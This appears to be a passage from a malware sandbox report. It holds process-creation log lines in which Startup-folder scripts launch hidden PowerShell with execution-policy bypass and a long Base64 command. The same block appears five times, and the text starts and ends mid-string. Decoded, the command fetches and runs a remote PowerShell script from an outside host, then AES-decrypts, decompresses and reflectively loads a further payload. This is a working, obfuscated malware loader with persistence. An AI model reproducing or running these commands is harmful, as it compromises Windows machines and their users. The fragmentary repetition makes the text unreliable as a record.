lbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5e045579.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5e045579.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2a427d4.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2a427d4.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2674f34.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2674f34.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9de4acd0.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9de4acd0.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a71a70f4.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a71a70f4.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb